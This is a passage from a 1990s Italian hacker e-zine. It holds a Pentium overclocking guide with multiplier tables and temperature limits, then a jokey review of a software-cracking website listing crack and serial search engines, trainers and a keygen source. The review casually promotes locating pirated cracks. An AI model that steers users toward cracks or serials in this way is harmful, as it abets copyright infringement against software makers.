P180 180 3.0 60 30
P200 200 3,0 66 33

Prestate moltissima attenzione e fate bene i calcoli: prima di cambiare i
ponticelli sulla scheda madre, ricontrollate tutto. Potete correre il rischio
di spingere un P90 a 180Mhz !

Dopo queste precisazioni, andiamo ad esaminare i possibili overclocking, sempre
che il vostro Pentium supporti ogni fattore di moltiplicazione (e c'e' solo un
modo per accorgersene: provare):

CPU Frequenza nominale Overclocking sicuro Overclocking spinto

P75 75 90 100-120
P90 90 100 120
P100 100 120 133
P120 120 133 150-166
P133 133 150-166 180-200
P150 150 166 187.5-200
P166 166 180-187.5 200 o +
P200 200 200 o +

Comunque e' molto difficile stabilire se l'overclocking sia sicuro o meno.
Personalmente ho visto Pentium a 133 andare a 180Mhz senza fare una piega,
mentre dei P100 rifiutarsi di lavorare a 120Mhz.

Se il computer funziona bene, dopo un'ora di lavoro, si puo' provare a toccare
la parte metallica del dissipatore della CPU. Se e' "caldino" allora tutto e'
OK, se e' caldo e' normale, se invece non si riesce a tener appogiato il dito
per piu' di 5/6 secondi, allora:

1.provare ad applicare della pasta al silicone come descritto
2.la ventola e' nuova ?
3.l'alimentazione e' VRE o STD ? Provare quella STD..
4.ridurre purtroppo il clock ...

Molto consigliati sono gli overclocking 90 --> 100 ; 120 --> 133 e 150 --> 166
per poter sfruttare tutta la potenza di una scheda madre a 66Mhz e bus PCI a
33Mhz.

Per chi invece avesse la possibilita' di testare la temperature della CPU (e lo
consiglio caldamente, scusate il gioco di parole :-) tenga presente che:

sino a 40øC e' tutto OK !!!
da 40 a 50øC va bene
da 50 a 60øC potrebbe andare meglio
sopra ai 60øC .... ALT !!!!!! Spegnere tutto !!


- NUOVE SCHEDE A 75 MHZ :


Da un po' di tempo a questa parte si stanno diffondendo sempre piu' schede
madri capaci di funzionare a 75Mhz, contro i 66 dei Pentium a 100, 133, 166 e
200Mhz.

Generalmente montano chipset Triton 430VX, ma non e' raro trovare anche 430HX.
Modello di punta : l'Asus P55T2P4 (disponibile anche in ATX), che oltre a
supportare i Pentium MMX (addirittura permette di abbassare la tensione anche
a 2.5Volt), dalla rev. 3.0 in poi, monta un chipset 430HX funzionante a 75Mhz
e certe volte anche a 68 e 83Mhz. Se volete avere ulteriori informazioni
riguardo la ponticellatura contattatemi via e-mail.

Piu' che per prestazioni, ma su questo punto torneremo in seguito, si e'
portato il bus a 75Mhz per supportare il Cyrix 6x86 P200+.

Ed il BUS PCI ? Nonostante sulla carta il PCI potrebbe funzionare sino a
notevoli frequenze di clock, attualmente il massimo e' di 33Mhz. Ma aumentato
da 66 a 75Mhz anche il PCI ne risente e si porta cosi' a 37.5Mhz. INTEL non ha
mai commentato questi "aggiornamenti" anche perche' sulla carta i chipset 430VX
e 430HX non superano i 66Mhz. Il discorso, probabilmente, cambiera' per il
430TX.

Se siete in possesso di una di questo piastre (basta consultarne il manuale)
allora tenete presente che:

Avendo come base 75Mhz si possono "creare" frequenza di clock molto strane.
Infatti si puo' avere:

75 x 1.5 = CPU a 112.5 Mhz
75 x 2 = CPU a 150 Mhz
75 x 2.5 = CPU a 187.5 Mhz
75 x 3 = CPU a 225 Mhz

Queste "nuove" frequenze si aggiungono quindi a quelle gia' note. Se la piastra
dispone anche del settaggio a 83Mhz allora si ottengono nuove frequenze:

83 x 2 = CPU a 166 Mhz
83 x 2.5 = CPU a 208 Mhz
83 x 3 = CPU a 249 Mhz

Un P166 potrebbe quindi essere spinto a 187.5, oppure un P200 portato a
207.5Mhz. Inoltre, se si considera che alcune CPU possono supportare solo il
fattore di moltiplicazione per il quale sono state vendute (2x i P133) allora i
piu' furbi si sono gia' resi conto che, sfruttando l'innalzamento del BUS, si
mantiene costante il fattore di moltiplicazione ma la frequenza della CPU
aumenta.... Quindi, per "fregare" INTEL, un P133 (66x2) puo' essere portato a
150 (75x2).

Ma in fin dei conti, a chi giova tutto cio'? In maniera piu' che ovvia tutto
questo fa aumentare la frequenza della CPU, incrementando in modo
inequivocabile le prestazioni (anche solo di un 5%, ma di sicuro non calano) e
questo e' dovuto anche al fatto che si innalza la frequenza della cache di II
livello, ma purtroppo c'e' un aspetto importantissimo da tenere in
considerazione: la RAM.

Ormai stanno scomparendo le memorie a 70ns e si stanno diffondendo sempre piu'
le 60ns e le EDO (che sono comunissime fast page con un buffer latch in
uscita).
La RAM e' una delle parti piu' lente del sistema (ovviamente escludendo HD,
CD-rom..) e che in una percentuale inversamente proporzionale alla quantita' di
cache montata "frena" ogni operazione.

Certo, avere una piastra a 75Mhz potrebbe si' migliorare l'accesso alla
memoria, ma l'aumento di velocita' del BUS con il quale la RAM e' messa in
comunicazione col sistema non implica anche l'aumento della velocita' della RAM
stessa.

Quindi molti BIOS ancora si trovano impacciati a dover gestire i wait state su
schede a 75Mhz con RAM molto lente, con inevitabili crash. Anche perche' solo
EDO a 50ns o BEDO potrebbero sfruttare al meglio 83Mhz....

- I PENTIUM MMX :

Finalmente! Dopo tanti annunci sono arrivati. Parlo delle CPU che Intel chiama
P55C, ovvero Pentium con estensioni multimediali. Queste CPU esternamente sono
quasi identiche ai Pentium che tutti conosciamo, piu' precisamente gli ultimi
modelli con package plastico e non ceramico. Ma che cosa hanno di diverso
questi processori? Vediamone le caratteristiche piu' importanti.

-57 istruzioni aggiuntive.
Queste sono le tanto pubblicizzate "estensioni multimediali", ovvero sono
istruzioni assembler, quindi ad un livello di programmazione fra i piu' bassi,
che permettono di manipolare dati multimediali in modo piu' efficiente.
Ovviamente il software DEVE supportare queste istruzioni, ed i giochi con cui
adesso ci divertiamo dovrebbero essere riscritti per sfruttare i P55C al
meglio.

Piedinatura:
Praticamente identica al Pentium che tutti conosciamo. Quindi upgrade sempre
possibile ? Assolutamente no, ed ecco il perche':

Tensione di alimentazione:
Intel ha deciso di abbassare ulteriormente la tensione di alimentazione delle
nuove CPU. Questo significa che se montassimo un Pentium MMX a 166Mhz in una
scheda su cui era installato con successo un Pentium 166 (senza MMX) la nuova
CPU dopo pochi attimi si danneggerebbe irrimediabilmente. Infatti il core della
CPU e' sceso da 3.3 a 2.8 Volt.
Quindi per poter effettuare l'upgrade la scheda madre deve supportare a tutti
gli effetti i P55C (basta consultarne il manuale).

Ottimizzazioni:
Anche se attualmente il software che supporti le istruzioni MMX scarseggia, i
nuovi Pentium sono ugualmente piu' veloci, ovviamente a parita' di clock, dei
"vecchi" P54C. Infatti Intel ha ottimizzato internamente il microcodice della
CPU ed ha raddoppiato le dimensione della cache di secondo livello (e cio' e'
molto positivo: questa infatti lavora alla medesima velocita' della CPU).
Quindi un P54C a 200Mhz dovrebbe equivalere un P55C a 166Mhz nel codice NON
MMX.

- ESPERIENZE:

Tralasciano i 68Mhz, in quanto difficilmente 2Mhz in possono creare problemi e
solo un tipo di scheda madre in commercio a volte lo supporta, occupiamoci ora
dei 75Mhz.

Prima di iniziare ricordo che il passaggio da 66 a 75Mhz comporta:

overclock del BUS PCI
overclock del chipset
overclock della cache L2
overclock della CPU
overclock della RAM
overclock di tutte le periferiche PCI
overclock di tutte le periferiche ISA


A volte certe periferiche PCI non gradiscono l'innalzamento della frequenza del
BUS. Certi controller SCSI o certe SVGA ne sono l'esempio. Sebbene generalmente
le piastre a questa velocita' modificano la latenza del PCI e le temporizzazioni
interne si possono verificare ugualmente crash.

Personalmente so che a volte il controller Adaptect 2940 puo' non reggere
questa frequenza, ma c'e' un modo che a volte risolve il problema dei crash.
Infatti nel menu del BIOS del controller stesso e' possibile modificare la
massima velocita' del protocollo SCSI da utilizzare per ciascun ID SCSI.
Abbassando questa impostazione non si peggiorano le prestazioni, al piu' il
sottosistema disco rimane invariato, ma a volte si rende il sistema stabile.

Stesso discorso vale anche per chi utilizza dischi rigidi EIDE. Alcuni modelli,
tra cui gli ultimi IBM, danno moltissimi problemi. Vale anche qui il discorso
fatto per i controller SCSI: basta abbassare da BIOS il settaggio da PIO 4 a
PIO 3/2 e a volte il sistema puo' ritornare stabile.
Se ancora siete in possesso di fast paged a 70ns il mio consiglio e' quello di
cambiarla assolutamente in (EDO e' forse meglio) a 60ns, specie se siete
interessati a frequenze maggiori o uguali a 75Mhz.

Certo anche della fp a 70ns puo' funzionare a 75Mhz, ma sarebbero neccessari
molti cicli di attesa.
Dopo aver settato la piastra a 75Mhz o piu', portare immediatamente da bios i
settaggi quasi al massimo, verificare la stabilita' del sistema e di
conseguenza abbassare o provare ad innalzare i tempi di accesso.

Un altro aspetto da tenere in considerazione e' la tensione di voltaggio della
CPU. Infatti certi Pentium funzionano perfettamente in STD (3.3 volt) ma quando
si overclockano preferiscono il VRE (3.45volt). Se il sistema dopo un overclock
ha qualche problema, specie con CPU Pentium a 150/166Mhz dal package ceramico,
allora "giocate la carta" VRE : puo' rivelarsi vincente. Un appunto per chi usa
il mitico Linux: se il GCC vi da' dei Signal 11 in compilazione, provare a
settare l'alimentazione in VRE. Attenzione, come sempre, alla temperatura.

Dopo tutte queste precisazioni anche i meno curiosi si saranno gia' posti la
domanda: "Ma se per ottenere un sistema Pentium 166 dato da 83x2 devo prestare
attenzione a tutte queste cose, in fondo chi me lo fa fare?"

Assolutamente nessuno obbliga nessuno a smanettare continuamente, ma
consideriamo questo.

I nuovi Pentium MMX con codice MMX sono piu' veloci non tanto per le
ottimizzazioni interne, ma perche' hanno una cache L1 di dimensioni doppie
rispetto a quella dei Pentium tradizionali.

Quindi un aumento di frequenza di tutti i componenti presenti sulla scheda
madre, compresa la cache L2, porta ad un significativo aumento di prestazioni.

Un Pentium a 166Mhz ottenuti da 83x2 il piu' delle volte e' nettamente
superiore ad un sistema P200 "tradizionale".

Generalmente non parlo di benchmark, ma ho fatto moltissimi test CPUMark32 e vi
posso assicurare che la frequenza di lavoro della scheda madre e della cache L2
influisce notevolmente sulle prestazioni globali del sistema. Ma attenzione a
non esagerare!

Wrote by Zen97 and Hal9000

P.S.: zen97 e hal9000 ringraziano Simone T. per il suo gentile supporto.

e-mail : hal9@cryogen.com
Zen97
Hal9000


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍSiTiÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ CRACKiNG NETW0RK ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Salve a tutti mi presento sono l'orsetto ricchione, ehm, questo non c'entra,
sono il vostro fidato Cavallo de Cavallis, fanalino di coda di questo magazine,
che galoppa ad illustrarvi pregi e difetti di un sito abbastanza nuovo dedicato
al vostro sport preferito dopo il lancio di nuke, il Crack !!
Per visualizzare il sitarello in questione puntate il vostro browser di fiducia
(o se preferite lanciate una tranquilla sessione di Teleport Pro e
scaricatevelo tutto :-)) su WWW.CRACKING.NET, ed ora.. Fuoco !!

Welcome to The Cracking Network ...

E cosi' eccoci a questa pagina, divisa in frame (che io personalmente odio ma
che in questo caso sono usati a buon fine) che si presenta dotata di una buona
grafica Hi-Tech e di altrettanto buoni contenuti.
Sulla destra potete osservare il Naviglio, laggiu' il Duomo con la Madunina,
ops, ho sbagliato guida ! :-) , no dai seriamente, sulla destra trovate una
immagine mappata che fa da menu e che ci introduce alle possibili bellezze del
sito; in sintesi abbiamo 8 possibilita' :

* FRAVIA'S PAGE OF REVERSE ENGINEERING
Da qui accedete alla famosissima pagina di Fravia dedicata al Reverse
Engineering, con le guide di +ORC, quelle realizzate dagli studenti della sua
+HCU, consigli su come rimanere anonimi sulla rete etc.. (Consiglio Personale,
non entrateci con Internet ExploDer :))

* SECURITY
Pagina ancora in costruzione, 2 soli link previsti , il primo ci porta alla
pagina ufficiale del John the Ripper mentre il secondo riguarda un patch per il
kernel del Linux (mi pare)

* JAMMER'S TRAINER SCENE
Pagina completamente dedicata ai trainer, cioe' come Jammer stesso li definisce
"quei piccoli programmi che ti permettono di fare cose che non hai mai fatto
prima. Essi possono darti vite infinite e farti saltare interi livelli. Il
Training e' un arte conosciuta solo da poche persone talentuose nel mondo e
sfortunatamente sta lentamente scomparendo dopo l'introduzione di - quella
merda di (by Cavallo) - Windows '95."

* KRACKAVISTA
Ecco qui un bel motore di ricerca per crack, seriali e trainer, forse migliore
di Astalavista (Astalavista.box.sk), sicuramente piu' veloce; non capisco pero'
perche' quando si cercano i crack invece di dare i collegamenti ai crack mostra
solo il nome e la descrizione, mentre tutto funziona alla perfezione con i
trainer, BOH SALCAZZO!!
Vi conviene segnarvi giu' il nome del Crack e poi andarlo a cercare con il fido
FTP-Search (ftpsearch.ntnu.no)

* LINKS
Un minielenco di siti interessanti, innanzitutto quelli relativi ad alcuni
gruppi MUST dell'underground tipo Razor, Hybrid, Prestige, poi qualche
sitarello vario e i links ai siti della Numega (produttori del grande SoftIce)
e della DataRescue (per l'IDA, P.S. LO VOGLIO !!).
Secondo me e' pero' un po' limitato, soprattutto pesa la mancanza del sito di
Lord Caligo (cracking.home.ml.org) che secondo me e' il massimo per
completezza.

* SIGN GUESTBOOK
Se volete lasciare un segno, un messaggio o magari un bambino morto, venite qui
:))


* PEOPLE
Qui potete trovare un elenco alfabetico di Cracker con riferimento ai tools
preferiti, alle loro Home Page etc..., indovinate chi trovate sotto la C ?!?
:-D

* #CRACKING
Qui trovate la #Cracking FAQ, con le domande piu' frequenti poste nel canale
IRC #cracking, oltre che il log di una conversazione che potrebbe capitare in
esso (per vedere il livello medio dei discorsi) e per finire la sorgente per il
100% keygenerator for CDR-Win 3.1e/DAO 16/32 che a quanto ne so ha notevoli
controlli del codice e se non erro sputtana i CD se trova un codice non
propriamente buono !! (da testare)

Se cliccate sullo scudo sarete invece portati alla pagina di Greythorne The
Technomancer.

Mah, tutto sommato darei come voto un 8/10 a questo sito, spero concordiate con
me e se non concordate C***I VOSTRI !! :)

Direi che ho concluso, Happy Cracking a tutti voi !!

Cavallo De Cavallis


********************************! ATTENZIONE !*********************************
* TUTTO IL MATERIALE CONTENUTO IN BUTCHERED FROM INSIDE E' DA RITENERSI A *
* SOLO SCOPO INFORMATIVO. LA REDAZIONE DI BUTCHERED FROM INSIDE NON SI RITIENE*
* IN ALCUN MODO RESPONSABILE PER DANNI CAUSATI DALL'USO DI PROGRAMMI, CODICE, * *
* INFORMAZIONI CONTENUTI ALL'INTERNO DELLA RIVISTA. PENSATE AI VOSTRI AMICI, *
* ALLA VOSTRA RAGAZZA, AI VOSTRI GENITORI, AL VOSTRO CANE, A NOI E SOPRATUTTO *
* A VOI STESSI PRIMA DI FARE QUALCHE CAZZATA! *
*******************************************************************************
* SI _VIETA_ DI POSTARE QUESTO MAGAZINE IN QUALSIASI NEWSGROUP *
*******************************************************************************
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ HANN0 C0LLAá0RAT0 A QUEST0 NUMER0: ³º
º³ ³º
º³ bELFaghor Nocturnus Daem0n - Blinking - Cavallo - Dr_Slump ³º
º³ DrumFire - Hal9000 - Nefasto - PFloriK - pIGpEN - PhoenYx ³º
º³ PUCK - |scacco| - SMa$teR - sPIRIT - The_Hawk - Vanadio ³º
º³ Zen97 ³º
º³ ³º
º³ iL SiT0 UŸŸiCiALE Di áUTCHERED ŸR0M iNSiDE: ³º
º³ http://bfi98.home.ml.org ³º
º³ ³º
º³ C0NTATTATECi ViA E-MAiL: ³º
º³ BFI98@USA.NET ³º
º³ ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT